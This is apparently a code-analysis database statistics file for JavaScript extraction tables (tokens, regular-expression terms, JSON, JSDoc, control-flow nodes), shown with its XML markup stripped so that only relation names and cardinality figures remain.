- - -2 -3 -14770 - - -3 -4 -6020 - - -4 -5 -3153 - - -5 -6 -1700 - - -6 -7 -4257 - - -7 -19 -3783 - - -19 -23 -3833 - - -23 -1390 -1514 - - - - - - -typ -propertyType - - -12 - - -1 -2 -19351 - - -2 -3 -10786 - - -3 -4 -5073 - - -4 -6 -2639 - - -6 -7 -3864 - - -7 -22 -3334 - - -22 -33 -3710 - - -33 -1390 -548 - - - - - - -name -typ - - -12 - - -1 -2 -4735 - - -2 -3 -7379 - - -3 -4 -2728 - - -4 -5 -1467 - - -5 -7 -1481 - - -7 -11 -1878 - - -11 -30 -1682 - - -30 -7825 -1070 - - - - - - -name -propertyType - - -12 - - -1 -2 -14690 - - -2 -3 -2698 - - -3 -4 -1925 - - -4 -8 -1697 - - -8 -3373 -1410 - - - - - - -propertyType -typ - - -12 - - -1 -2 -112801 - - -2 -3 -12999 - - -3 -19440 -5057 - - - - - - -propertyType -name - - -12 - - -1 -2 -129508 - - -2 -3475 -1349 - - - - - - - - -lines -id -1622184 - - -id -1622184 - - -toplevel -5312 - - -text -648122 - - -terminator -6 - - - - -id -toplevel - - -12 - - -1 -2 -1622184 - - - - - - -id -text - - -12 - - -1 -2 -1622184 - - - - - - -id -terminator - - -12 - - -1 -2 -1622184 - - - - - - -toplevel -id - - -12 - - -1 -12 -425 - - -12 -24 -415 - - -24 -37 -419 - - -37 -50 -404 - - -50 -66 -411 - - -66 -85 -400 - - -85 -108 -405 - - -108 -138 -402 - - -138 -174 -402 - - -174 -232 -405 - - -232 -331 -399 - - -331 -547 -399 - - -548 -4700 -399 - - -4783 -277404 -27 - - - - - - -toplevel -text - - -12 - - -1 -11 -441 - - -11 -21 -427 - - -21 -30 -414 - - -30 -40 -452 - - -40 -51 -435 - - -51 -64 -413 - - -64 -79 -404 - - -79 -96 -401 - - -96 -121 -400 - - -121 -158 -401 - - -158 -220 -399 - - -220 -387 -401 - - -388 -60934 -324 - - - - - - -toplevel -terminator - - -12 - - -1 -2 -5046 - - -2 -6 -266 - - - - - - -text -id - - -12 - - -1 -2 -513961 - - -2 -3 -84265 - - -3 -49 -48993 - - -49 -175121 -903 - - - - - - -text -toplevel - - -12 - - -1 -2 -569267 - - -2 -3 -56143 - - -3 -5068 -22712 - - - - - - -text -terminator - - -12 - - -1 -2 -647931 - - -2 -4 -191 - - - - - - -terminator -id - - -12 - - -3 -4 -3 - - -349 -350 -1 - 
- -1830 -1831 -1 - - -1619996 -1619997 -1 - - - - - - -terminator -toplevel - - -12 - - -3 -4 -3 - - -11 -12 -1 - - -349 -350 -1 - - -5218 -5219 -1 - - - - - - -terminator -text - - -12 - - -1 -2 -3 - - -110 -111 -1 - - -1093 -1094 -1 - - -647111 -647112 -1 - - - - - - - - -indentation -1145010 - - -file -5728 - - -lineno -40788 - - -indentChar -2 - - -indentDepth -72 - - - - -file -lineno - - -12 - - -1 -9 -440 - - -9 -18 -471 - - -18 -29 -439 - - -29 -41 -451 - - -41 -54 -460 - - -54 -71 -442 - - -71 -91 -441 - - -91 -118 -430 - - -118 -152 -432 - - -152 -205 -434 - - -205 -295 -431 - - -295 -503 -430 - - -503 -38151 -427 - - - - - - -file -indentChar - - -12 - - -1 -2 -5692 - - -2 -3 -36 - - - - - - -file -indentDepth - - -12 - - -1 -2 -287 - - -2 -3 -401 - - -3 -4 -665 - - -4 -5 -815 - - -5 -6 -814 - - -6 -7 -687 - - -7 -8 -567 - - -8 -9 -390 - - -9 -11 -503 - - -11 -17 -462 - - -17 -67 -137 - - - - - - -lineno -file - - -12 - - -1 -2 -10935 - - -2 -3 -5303 - - -3 -4 -12061 - - -4 -6 -3644 - - -6 -13 -3223 - - -13 -31 -3090 - - -31 -3986 -2532 - - - - - - -lineno -indentChar - - -12 - - -1 -2 -38720 - - -2 -3 -2068 - - - - - - -lineno -indentDepth - - -12 - - -1 -2 -11626 - - -2 -3 -7847 - - -3 -4 -10434 - - -4 -5 -2688 - - -5 -8 -3316 - - -8 -13 -3144 - - -13 -39 -1733 - - - - - - -indentChar -file - - -12 - - -42 -43 -1 - - -5722 -5723 -1 - - - - - - -indentChar -lineno - - -12 - - -2068 -2069 -1 - - -40788 -40789 -1 - - - - - - -indentChar -indentDepth - - -12 - - -10 -11 -1 - - -72 -73 -1 - - - - - - -indentDepth -file - - -12 - - -1 -6 -6 - - -6 -9 -6 - - -9 -20 -6 - - -21 -30 -6 - - -38 -57 -6 - - -59 -90 -6 - - -90 -124 -6 - - -132 -160 -6 - - -165 -211 -6 - - -213 -337 -6 - - -377 -1532 -6 - - -1919 -5487 -6 - - - - - - -indentDepth -lineno - - -12 - - -2 -8 -6 - - -11 -19 -6 - - -25 -44 -6 - - -53 -67 -6 - - -67 -89 -6 - - -102 -169 -6 - - -183 -239 -6 - - -269 -411 -6 - - -417 -971 -6 - - -1129 -2732 -6 - - -4374 -9301 -6 - - -11828 -21226 -6 - - - - 
- - -indentDepth -indentChar - - -12 - - -1 -2 -62 - - -2 -3 -10 - - - - - - - - -js_parse_errors -3 - - -id -3 - - -toplevel -3 - - -message -1 - - -line -3 - - - - -id -toplevel - - -12 - - -1 -2 -3 - - - - - - -id -message - - -12 - - -1 -2 -3 - - - - - - -id -line - - -12 - - -1 -2 -3 - - - - - - -toplevel -id - - -12 - - -1 -2 -3 - - - - - - -toplevel -message - - -12 - - -1 -2 -3 - - - - - - -toplevel -line - - -12 - - -1 -2 -3 - - - - - - -message -id - - -12 - - -3 -4 -1 - - - - - - -message -toplevel - - -12 - - -3 -4 -1 - - - - - - -message -line - - -12 - - -3 -4 -1 - - - - - - -line -id - - -12 - - -1 -2 -3 - - - - - - -line -toplevel - - -12 - - -1 -2 -3 - - - - - - -line -message - - -12 - - -1 -2 -3 - - - - - - - - -regexpterm -id -33197 - - -id -33197 - - -kind -25 - - -parent -13313 - - -idx -76 - - -tostring -4610 - - - - -id -kind - - -12 - - -1 -2 -33197 - - - - - - -id -parent - - -12 - - -1 -2 -33197 - - - - - - -id -idx - - -12 - - -1 -2 -33197 - - - - - - -id -tostring - - -12 - - -1 -2 -33197 - - - - - - -kind -id - - -12 - - -1 -4 -2 - - -7 -12 -2 - - -12 -16 -2 - - -59 -100 -2 - - -146 -265 -2 - - -445 -479 -2 - - -599 -620 -2 - - -637 -642 -2 - - -826 -1058 -2 - - -1067 -1474 -2 - - -1573 -1693 -2 - - -2613 -3372 -2 - - -15489 -15490 -1 - - - - - - -kind -parent - - -12 - - -1 -4 -2 - - -7 -8 -1 - - -11 -12 -2 - - -15 -46 -2 - - -79 -132 -2 - - -132 -331 -2 - - -367 -381 -2 - - -437 -638 -2 - - -641 -737 -2 - - -825 -1005 -2 - - -1391 -1403 -2 - - -1465 -1645 -2 - - -2691 -3963 -2 - - - - - - -kind -idx - - -12 - - -1 -2 -2 - - -2 -3 -2 - - -4 -5 -3 - - -6 -8 -2 - - -12 -15 -2 - - -17 -19 -2 - - -19 -21 -2 - - -22 -23 -1 - - -23 -24 -2 - - -25 -27 -2 - - -27 -30 -2 - - -42 -49 -2 - - -73 -74 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -6 - - -2 -5 -2 - - -6 -11 -2 - - -13 -28 -2 - - -31 -59 -2 - - -65 -78 -2 - - -100 -118 -2 - - -149 -171 -2 - - -175 -391 -2 - - -433 -791 -2 - - -1992 -1993 -1 - - - - - - -parent -id - - -12 - - -1 
-2 -7691 - - -2 -3 -2568 - - -3 -4 -924 - - -4 -7 -1189 - - -7 -77 -941 - - - - - - -parent -kind - - -12 - - -1 -2 -10080 - - -2 -3 -2026 - - -3 -5 -1068 - - -5 -9 -139 - - - - - - -parent -idx - - -12 - - -1 -2 -7691 - - -2 -3 -2568 - - -3 -4 -924 - - -4 -7 -1189 - - -7 -77 -941 - - - - - - -parent -tostring - - -12 - - -1 -2 -7733 - - -2 -3 -2644 - - -3 -4 -940 - - -4 -7 -1230 - - -7 -32 -766 - - - - - - -idx -id - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -4 -8 -7 - - -8 -13 -7 - - -15 -22 -6 - - -26 -35 -5 - - -37 -51 -6 - - -53 -75 -6 - - -79 -141 -6 - - -186 -325 -6 - - -385 -1182 -6 - - -1578 -13314 -5 - - - - - - -idx -kind - - -12 - - -1 -2 -18 - - -2 -3 -15 - - -3 -4 -8 - - -4 -5 -7 - - -5 -8 -6 - - -9 -13 -6 - - -13 -16 -7 - - -17 -20 -7 - - -21 -25 -2 - - - - - - -idx -parent - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -4 -8 -7 - - -8 -13 -7 - - -15 -22 -6 - - -26 -35 -5 - - -37 -51 -6 - - -53 -75 -6 - - -79 -141 -6 - - -186 -325 -6 - - -385 -1182 -6 - - -1578 -13314 -5 - - - - - - -idx -tostring - - -12 - - -1 -2 -8 - - -2 -3 -8 - - -3 -4 -4 - - -5 -7 -6 - - -7 -10 -6 - - -10 -15 -6 - - -16 -21 -7 - - -21 -26 -6 - - -29 -48 -6 - - -48 -75 -6 - - -82 -147 -6 - - -158 -940 -6 - - -3258 -3259 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -3026 - - -2 -3 -751 - - -3 -5 -391 - - -5 -49 -346 - - -49 -1013 -96 - - - - - - -tostring -kind - - -12 - - -1 -2 -4605 - - -2 -3 -5 - - - - - - -tostring -parent - - -12 - - -1 -2 -3041 - - -2 -3 -746 - - -3 -5 -389 - - -5 -53 -346 - - -54 -875 -88 - - - - - - -tostring -idx - - -12 - - -1 -2 -4102 - - -2 -5 -351 - - -5 -58 -157 - - - - - - - - -regexp_parse_errors -id -122 - - -id -122 - - -regexp -41 - - -message -5 - - - - -id -regexp - - -12 - - -1 -2 -122 - - - - - - -id -message - - -12 - - -1 -2 -122 - - - - - - -regexp -id - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -3 -4 -12 - - -4 -5 -5 - - -5 -6 -7 - - -6 -7 -1 - - - - - - -regexp -message - - -12 - - -1 -2 -18 - - -2 -3 -4 - - -3 -4 -19 - - - - - - -message -id - - -12 - - 
-1 -2 -1 - - -8 -9 -1 - - -22 -23 -1 - - -23 -24 -1 - - -68 -69 -1 - - - - - - -message -regexp - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -22 -23 -1 - - -23 -24 -1 - - -35 -36 -1 - - - - - - - - -is_greedy -2629 - - -id -2629 - - - - - -isOptionalChaining -100 - - -id -100 - - - - - - -range_quantifier_lower_bound -146 - - -id -146 - - -lo -11 - - - - -id -lo - - -12 - - -1 -2 -146 - - - - - - -lo -id - - -12 - - -1 -2 -4 - - -4 -5 -1 - - -5 -6 -1 - - -17 -18 -1 - - -20 -21 -1 - - -28 -29 -1 - - -33 -34 -1 - - -35 -36 -1 - - - - - - - - -range_quantifier_upper_bound -45 - - -id -45 - - -hi -13 - - - - -id -hi - - -12 - - -1 -2 -45 - - - - - - -hi -id - - -12 - - -1 -2 -5 - - -2 -3 -3 - - -3 -4 -2 - - -8 -9 -1 - - -9 -10 -1 - - -11 -12 -1 - - - - - - - - -is_capture -1280 - - -id -1280 - - -number -14 - - - - -id -number - - -12 - - -1 -2 -1280 - - - - - - -number -id - - -12 - - -1 -2 -1 - - -2 -3 -2 - - -4 -5 -2 - - -6 -7 -2 - - -7 -8 -1 - - -12 -13 -1 - - -23 -24 -1 - - -55 -56 -1 - - -108 -109 -1 - - -276 -277 -1 - - -774 -775 -1 - - - - - - - - -is_named_capture -1280 - - -id -1280 - - -name -14 - - - - -id -name - - -12 - - -1 -2 -1280 - - - - - - -name -id - - -12 - - -1 -2 -1 - - -2 -3 -2 - - -4 -5 -2 - - -6 -7 -2 - - -7 -8 -1 - - -12 -13 -1 - - -23 -24 -1 - - -55 -56 -1 - - -108 -109 -1 - - -276 -277 -1 - - -774 -775 -1 - - - - - - - - -is_inverted -458 - - -id -458 - - - - - -regexp_const_value -19032 - - -id -19032 - - -value -237 - - - - -id -value - - -12 - - -1 -2 -19032 - - - - - - -value -id - - -12 - - -1 -2 -80 - - -2 -3 -12 - - -3 -4 -10 - - -4 -5 -20 - - -5 -17 -18 - - -17 -30 -18 - - -30 -66 -18 - - -68 -143 -18 - - -155 -242 -18 - - -251 -555 -18 - - -581 -1013 -7 - - - - - - - - -char_class_escape -1573 - - -id -1573 - - -value -6 - - - - -id -value - - -12 - - -1 -2 -1573 - - - - - - -value -id - - -12 - - -11 -12 -1 - - -14 -15 -1 - - -92 -93 -1 - - -199 -200 -1 - - -378 -379 -1 - - -879 -880 -1 - - - - - - - - -unicode_property_escapename -1573 
- - -id -1573 - - -name -6 - - - - -id -name - - -12 - - -1 -2 -1573 - - - - - - -name -id - - -12 - - -11 -12 -1 - - -14 -15 -1 - - -92 -93 -1 - - -199 -200 -1 - - -378 -379 -1 - - -879 -880 -1 - - - - - - - - -unicode_property_escapevalue -1573 - - -id -1573 - - -value -6 - - - - -id -value - - -12 - - -1 -2 -1573 - - - - - - -value -id - - -12 - - -11 -12 -1 - - -14 -15 -1 - - -92 -93 -1 - - -199 -200 -1 - - -378 -379 -1 - - -879 -880 -1 - - - - - - - - -backref -11 - - -id -11 - - -value -4 - - - - -id -value - - -12 - - -1 -2 -11 - - - - - - -value -id - - -12 - - -1 -2 -2 - - -3 -4 -1 - - -6 -7 -1 - - - - - - - - -named_backref -11 - - -id -11 - - -name -4 - - - - -id -name - - -12 - - -1 -2 -11 - - - - - - -name -id - - -12 - - -1 -2 -2 - - -3 -4 -1 - - -6 -7 -1 - - - - - - - - -tokeninfo -id -8770869 - - -id -8770869 - - -kind -9 - - -toplevel -5312 - - -idx -1581031 - - -value -234179 - - - - -id -kind - - -12 - - -1 -2 -8770869 - - - - - - -id -toplevel - - -12 - - -1 -2 -8770869 - - - - - - -id -idx - - -12 - - -1 -2 -8770869 - - - - - - -id -value - - -12 - - -1 -2 -8770869 - - - - - - -kind -id - - -12 - - -2773 -2774 -1 - - -5312 -5313 -1 - - -15526 -15527 -1 - - -31654 -31655 -1 - - -269555 -269556 -1 - - -551767 -551768 -1 - - -557620 -557621 -1 - - -2268328 -2268329 -1 - - -5068334 -5068335 -1 - - - - - - -kind -toplevel - - -12 - - -471 -472 -1 - - -2204 -2205 -1 - - -2851 -2852 -1 - - -3204 -3205 -1 - - -5089 -5090 -1 - - -5219 -5220 -1 - - -5294 -5295 -1 - - -5300 -5301 -1 - - -5312 -5313 -1 - - - - - - -kind -idx - - -12 - - -1949 -1950 -1 - - -2130 -2131 -1 - - -8409 -8410 -1 - - -12883 -12884 -1 - - -51181 -51182 -1 - - -130388 -130389 -1 - - -409369 -409370 -1 - - -583910 -583911 -1 - - -1104589 -1104590 -1 - - - - - - -kind -value - - -12 - - -1 -2 -2 - - -2 -3 -1 - - -34 -35 -1 - - -52 -53 -1 - - -1596 -1597 -1 - - -59827 -59828 -1 - - -85214 -85215 -1 - - -87463 -87464 -1 - - - - - - -toplevel -id - - -12 - - -1 -45 -403 - - -45 -95 -408 
- - -95 -149 -399 - - -149 -212 -408 - - -212 -291 -405 - - -291 -362 -399 - - -362 -461 -401 - - -461 -585 -399 - - -585 -756 -399 - - -756 -1013 -399 - - -1013 -1389 -399 - - -1389 -2313 -400 - - -2320 -6681 -399 - - -6717 -1581032 -94 - - - - - - -toplevel -kind - - -12 - - -1 -5 -174 - - -5 -6 -1046 - - -6 -7 -1326 - - -7 -8 -1279 - - -8 -9 -1214 - - -9 -10 -273 - - - - - - -toplevel -idx - - -12 - - -1 -45 -403 - - -45 -95 -408 - - -95 -149 -399 - - -149 -212 -408 - - -212 -291 -405 - - -291 -362 -399 - - -362 -461 -401 - - -461 -585 -399 - - -585 -756 -399 - - -756 -1013 -399 - - -1013 -1389 -399 - - -1389 -2313 -400 - - -2320 -6681 -399 - - -6717 -1581032 -94 - - - - - - -toplevel -value - - -12 - - -1 -21 -423 - - -21 -33 -416 - - -33 -44 -424 - - -44 -55 -400 - - -55 -65 -426 - - -65 -76 -407 - - -76 -88 -426 - - -88 -102 -402 - - -102 -120 -405 - - -120 -144 -401 - - -144 -180 -400 - - -180 -260 -400 - - -260 -46630 -382 - - - - - - -idx -id - - -12 - - -1 -2 -1083847 - - -2 -3 -166188 - - -3 -6 -136823 - - -6 -9 -123495 - - -9 -5313 -70678 - - - - - - -idx -kind - - -12 - - -1 -2 -1175018 - - -2 -3 -207984 - - -3 -4 -120754 - - -4 -10 -77275 - - - - - - -idx -toplevel - - -12 - - -1 -2 -1083847 - - -2 -3 -166188 - - -3 -6 -136823 - - -6 -9 -123495 - - -9 -5313 -70678 - - - - - - -idx -value - - -12 - - -1 -2 -1089271 - - -2 -3 -165753 - - -3 -5 -104658 - - -5 -8 -145624 - - -8 -1449 -75725 - - - - - - -value -id - - -12 - - -1 -2 -104636 - - -2 -3 -47235 - - -3 -4 -20077 - - -4 -5 -16835 - - -5 -9 -19608 - - -9 -34 -17687 - - -34 -789848 -8101 - - - - - - -value -kind - - -12 - - -1 -2 -234168 - - -2 -3 -11 - - - - - - -value -toplevel - - -12 - - -1 -2 -174552 - - -2 -3 -34819 - - -3 -8 -18537 - - -8 -5313 -6271 - - - - - - -value -idx - - -12 - - -1 -2 -105969 - - -2 -3 -47057 - - -3 -4 -19986 - - -4 -5 -16682 - - -5 -9 -19402 - - -9 -36 -17686 - - -36 -347359 -7397 - - - - - - - - -next_token -104943 - - -comment -104943 - - -token -74457 - - - - 
-comment -token - - -12 - - -1 -2 -104943 - - - - - - -token -comment - - -12 - - -1 -2 -59983 - - -2 -3 -8628 - - -3 -12 -5601 - - -12 -141 -245 - - - - - - - - -json -id -1643352 - - -id -1643352 - - -kind -6 - - -parent -617634 - - -idx -159429 - - -tostring -768907 - - - - -id -kind - - -12 - - -1 -2 -1643352 - - - - - - -id -parent - - -12 - - -1 -2 -1643352 - - - - - - -id -idx - - -12 - - -1 -2 -1643352 - - - - - - -id -tostring - - -12 - - -1 -2 -1643352 - - - - - - -kind -id - - -12 - - -24 -25 -1 - - -654 -655 -1 - - -175925 -175926 -1 - - -273113 -273114 -1 - - -441281 -441282 -1 - - -752355 -752356 -1 - - - - - - -kind -parent - - -12 - - -17 -18 -1 - - -411 -412 -1 - - -165183 -165184 -1 - - -167132 -167133 -1 - - -271547 -271548 -1 - - -452264 -452265 -1 - - - - - - -kind -idx - - -12 - - -10 -11 -1 - - -65 -66 -1 - - -152 -153 -1 - - -174 -175 -1 - - -198 -199 -1 - - -159429 -159430 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -2865 -2866 -1 - - -100735 -100736 -1 - - -271467 -271468 -1 - - -393837 -393838 -1 - - - - - - -parent -id - - -12 - - -1 -2 -127476 - - -2 -3 -184044 - - -3 -4 -285109 - - -4 -159430 -21005 - - - - - - -parent -kind - - -12 - - -1 -2 -179808 - - -2 -3 -437119 - - -3 -7 -707 - - - - - - -parent -idx - - -12 - - -1 -2 -127476 - - -2 -3 -184044 - - -3 -4 -285109 - - -4 -159430 -21005 - - - - - - -parent -tostring - - -12 - - -1 -2 -173483 - - -2 -3 -197229 - - -3 -4 -240036 - - -4 -135127 -6886 - - - - - - -idx -id - - -12 - - -1 -2 -158929 - - -3 -617635 -500 - - - - - - -idx -kind - - -12 - - -1 -2 -159178 - - -2 -7 -251 - - - - - - -idx -parent - - -12 - - -1 -2 -158929 - - -3 -617635 -500 - - - - - - -idx -tostring - - -12 - - -1 -2 -158929 - - -2 -429145 -500 - - - - - - -tostring -id - - -12 - - -1 -2 -511110 - - -2 -3 -165121 - - -3 -6 -69702 - - -6 -63547 -22974 - - - - - - -tostring -kind - - -12 - - -1 -2 -768907 - - - - - - -tostring -parent - - -12 - - -1 -2 -562365 - - -2 -3 -144455 - - -3 
-10 -58431 - - -10 -63547 -3656 - - - - - - -tostring -idx - - -12 - - -1 -2 -554379 - - -2 -3 -185366 - - -3 -720 -29162 - - - - - - - - -json_literals -1026146 - - -value -397229 - - -raw -397431 - - -expr -1026146 - - - - -value -raw - - -12 - - -1 -2 -397027 - - -2 -3 -202 - - - - - - -value -expr - - -12 - - -1 -2 -216149 - - -2 -3 -128106 - - -3 -5 -28217 - - -5 -63547 -24757 - - - - - - -raw -value - - -12 - - -1 -2 -397431 - - - - - - -raw -expr - - -12 - - -1 -2 -216237 - - -2 -3 -128277 - - -3 -5 -28205 - - -5 -63547 -24712 - - - - - - -expr -value - - -12 - - -1 -2 -1026146 - - - - - - -expr -raw - - -12 - - -1 -2 -1026146 - - - - - - - - -json_properties -1186648 - - -obj -441238 - - -property -2285 - - -value -1186648 - - - - -obj -property - - -12 - - -1 -2 -685 - - -2 -3 -161803 - - -3 -4 -272428 - - -4 -252 -6322 - - - - - - -obj -value - - -12 - - -1 -2 -685 - - -2 -3 -161803 - - -3 -4 -272428 - - -4 -252 -6322 - - - - - - -property -obj - - -12 - - -1 -2 -1378 - - -2 -3 -371 - - -3 -4 -199 - - -4 -17 -174 - - -18 -429290 -163 - - - - - - -property -value - - -12 - - -1 -2 -1378 - - -2 -3 -371 - - -3 -4 -199 - - -4 -17 -174 - - -18 -429290 -163 - - - - - - -value -obj - - -12 - - -1 -2 -1186648 - - - - - - -value -property - - -12 - - -1 -2 -1186648 - - - - - - - - -json_errors -id -1 - - -id -1 - - -message -1 - - - - -id -message - - -12 - - -1 -2 -1 - - - - - - -message -id - - -12 - - -1 -2 -1 - - - - - - - - -json_locations -712 - - -locatable -712 - - -location -712 - - - - -locatable -location - - -12 - - -1 -2 -712 - - - - - - -location -locatable - - -12 - - -1 -2 -712 - - - - - - - - -hasLocation -19213780 - - -locatable -19213780 - - -location -15664049 - - - - -locatable -location - - -12 - - -1 -2 -19213780 - - - - - - -location -locatable - - -12 - - -1 -2 -12144311 - - -2 -3 -3490097 - - -3 -6 -29641 - - - - - - - - -entry_cfg_node -id -121542 - - -id -121542 - - -container -121542 - - - - -id -container - - -12 - - -1 -2 -121542 - - 
- - - - -container -id - - -12 - - -1 -2 -121542 - - - - - - - - -exit_cfg_node -id -121542 - - -id -121542 - - -container -121542 - - - - -id -container - - -12 - - -1 -2 -121542 - - - - - - -container -id - - -12 - - -1 -2 -121542 - - - - - - - - -guard_node -177785 - - -id -177785 - - -kind -2 - - -test -91338 - - - - -id -kind - - -12 - - -1 -2 -177785 - - - - - - -id -test - - -12 - - -1 -2 -177785 - - - - - - -kind -id - - -12 - - -86336 -86337 -1 - - -91449 -91450 -1 - - - - - - -kind -test - - -12 - - -82430 -82431 -1 - - -89999 -90000 -1 - - - - - - -test -id - - -12 - - -1 -2 -10245 - - -2 -3 -76994 - - -3 -21 -4099 - - - - - - -test -kind - - -12 - - -1 -2 -10247 - - -2 -3 -81091 - - - - - - - - -successor -6873752 - - -pred -6717415 - - -succ -6718602 - - - - -pred -succ - - -12 - - -1 -2 -6588118 - - -2 -21 -129297 - - - - - - -succ -pred - - -12 - - -1 -2 -6617438 - - -2 -253 -101164 - - - - - - - - -jsdoc -id -19270 - - -id -19270 - - -description -9383 - - -comment -19270 - - - - -id -description - - -12 - - -1 -2 -19270 - - - - - - -id -comment - - -12 - - -1 -2 -19270 - - - - - - -description -id - - -12 - - -1 -2 -7588 - - -2 -3 -1387 - - -3 -5727 -408 - - - - - - -description -comment - - -12 - - -1 -2 -7588 - - -2 -3 -1387 - - -3 -5727 -408 - - - - - - -comment -id - - -12 - - -1 -2 -19270 - - - - - - -comment -description - - -12 - - -1 -2 -19270 - - - - - - - - -jsdoc_tags -id -29323 - - -id -29323 - - -title -92 - - -parent -14226 - - -idx -66 - - -tostring -92 - - - - -id -title - - -12 - - -1 -2 -29323 - - - - - - -id -parent - - -12 - - -1 -2 -29323 - - - - - - -id -idx - - -12 - - -1 -2 -29323 - - - - - - -id -tostring - - -12 - - -1 -2 -29323 - - - - - - -title -id - - -12 - - -1 -2 -11 - - -2 -3 -5 - - -3 -5 -7 - - -5 -7 -8 - - -8 -12 -7 - - -13 -17 -7 - - -20 -35 -7 - - -40 -55 -7 - - -58 -111 -7 - - -114 -167 -8 - - -170 -331 -7 - - -587 -913 -7 - - -2221 -10284 -4 - - - - - - -title -parent - - -12 - - -1 -2 -11 - - -2 -3 -5 - - -3 
-4 -5 - - -4 -6 -7 - - -6 -10 -8 - - -10 -16 -7 - - -16 -26 -7 - - -26 -36 -7 - - -38 -67 -7 - - -68 -111 -7 - - -137 -213 -7 - - -232 -702 -7 - - -870 -6020 -7 - - - - - - -title -idx - - -12 - - -1 -2 -35 - - -2 -3 -8 - - -3 -4 -7 - - -4 -5 -8 - - -5 -6 -8 - - -6 -7 -5 - - -7 -8 -4 - - -8 -10 -8 - - -10 -31 -7 - - -46 -59 -2 - - - - - - -title -tostring - - -12 - - -1 -2 -92 - - - - - - -parent -id - - -12 - - -1 -2 -6064 - - -2 -3 -4452 - - -3 -4 -2064 - - -4 -5 -913 - - -5 -67 -733 - - - - - - -parent -title - - -12 - - -1 -2 -6972 - - -2 -3 -4911 - - -3 -4 -1793 - - -4 -8 -550 - - - - - - -parent -idx - - -12 - - -1 -2 -6064 - - -2 -3 -4452 - - -3 -4 -2064 - - -4 -5 -913 - - -5 -67 -733 - - - - - - -parent -tostring - - -12 - - -1 -2 -6972 - - -2 -3 -4911 - - -3 -4 -1793 - - -4 -8 -550 - - - - - - -idx -id - - -12 - - -1 -2 -2 - - -2 -3 -29 - - -3 -4 -6 - - -4 -5 -5 - - -5 -6 -6 - - -7 -11 -5 - - -11 -53 -5 - - -89 -1647 -5 - - -3710 -14227 -3 - - - - - - -idx -title - - -12 - - -1 -2 -9 - - -2 -3 -31 - - -3 -4 -9 - - -4 -6 -6 - - -8 -21 -5 - - -29 -61 -5 - - -70 -71 -1 - - - - - - -idx -parent - - -12 - - -1 -2 -2 - - -2 -3 -29 - - -3 -4 -6 - - -4 -5 -5 - - -5 -6 -6 - - -7 -11 -5 - - -11 -53 -5 - - -89 -1647 -5 - - -3710 -14227 -3 - - - - - - -idx -tostring - - -12 - - -1 -2 -9 - - -2 -3 -31 - - -3 -4 -9 - - -4 -6 -6 - - -8 -21 -5 - - -29 -61 -5 - - -70 -71 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -11 - - -2 -3 -5 - - -3 -5 -7 - - -5 -7 -8 - - -8 -12 -7 - - -13 -17 -7 - - -20 -35 -7 - - -40 -55 -7 - - -58 -111 -7 - - -114 -167 -8 - - -170 -331 -7 - - -587 -913 -7 - - -2221 -10284 -4 - - - - - - -tostring -title - - -12 - - -1 -2 -92 - - - - - - -tostring -parent - - -12 - - -1 -2 -11 - - -2 -3 -5 - - -3 -4 -5 - - -4 -6 -7 - - -6 -10 -8 - - -10 -16 -7 - - -16 -26 -7 - - -26 -36 -7 - - -38 -67 -7 - - -68 -111 -7 - - -137 -213 -7 - - -232 -702 -7 - - -870 -6020 -7 - - - - - - -tostring -idx - - -12 - - -1 -2 -35 - - -2 -3 -8 - - -3 -4 -7 - - -4 -5 -8 - - 
-5 -6 -8 - - -6 -7 -5 - - -7 -8 -4 - - -8 -10 -8 - - -10 -31 -7 - - -46 -59 -2 - - - - - - - - -jsdoc_tag_descriptions -13676 - - -tag -13676 - - -text -7866 - - - - -tag -text - - -12 - - -1 -2 -13676 - - - - - - -text -tag - - -12 - - -1 -2 -6089 - - -2 -3 -1025 - - -3 -8 -596 - - -8 -459 -156 - - - - - - - - -jsdoc_tag_names -11506 - - -tag -11506 - - -text -2647 - - - - -tag -text - - -12 - - -1 -2 -11506 - - - - - - -text -tag - - -12 - - -1 -2 -1398 - - -2 -3 -569 - - -3 -4 -201 - - -4 -7 -208 - - -7 -24 -200 - - -24 -498 -71 - - - - - - - - -jsdoc_type_exprs -id -22481 - - -id -22481 - - -kind -15 - - -parent -21039 - - -idx -17 - - -tostring -1447 - - - - -id -kind - - -12 - - -1 -2 -22481 - - - - - - -id -parent - - -12 - - -1 -2 -22481 - - - - - - -id -idx - - -12 - - -1 -2 -22481 - - - - - - -id -tostring - - -12 - - -1 -2 -22481 - - - - - - -kind -id - - -12 - - -8 -9 -1 - - -19 -20 -1 - - -27 -28 -1 - - -35 -36 -1 - - -55 -56 -1 - - -91 -92 -1 - - -287 -288 -1 - - -292 -293 -1 - - -303 -304 -1 - - -310 -311 -1 - - -316 -317 -1 - - -536 -537 -1 - - -668 -669 -1 - - -895 -896 -1 - - -18639 -18640 -1 - - - - - - -kind -parent - - -12 - - -8 -9 -1 - - -19 -20 -1 - - -23 -24 -1 - - -35 -36 -1 - - -55 -56 -1 - - -90 -91 -1 - - -287 -288 -2 - - -301 -302 -1 - - -310 -311 -1 - - -314 -315 -1 - - -524 -525 -1 - - -583 -584 -1 - - -890 -891 -1 - - -17717 -17718 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -3 - - -2 -3 -2 - - -3 -4 -5 - - -4 -5 -2 - - -5 -6 -1 - - -13 -14 -1 - - -16 -17 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -5 - - -5 -6 -1 - - -6 -7 -1 - - -51 -52 -1 - - -57 -58 -1 - - -86 -87 -1 - - -89 -90 -1 - - -104 -105 -1 - - -155 -156 -1 - - -194 -195 -1 - - -696 -697 -1 - - - - - - -parent -id - - -12 - - -1 -2 -19985 - - -2 -16 -1054 - - - - - - -parent -kind - - -12 - - -1 -2 -20644 - - -2 -4 -395 - - - - - - -parent -idx - - -12 - - -1 -2 -19985 - - -2 -16 -1054 - - - - - - -parent -tostring - - -12 - - -1 -2 -19997 - - -2 -7 -1042 - - - - - 
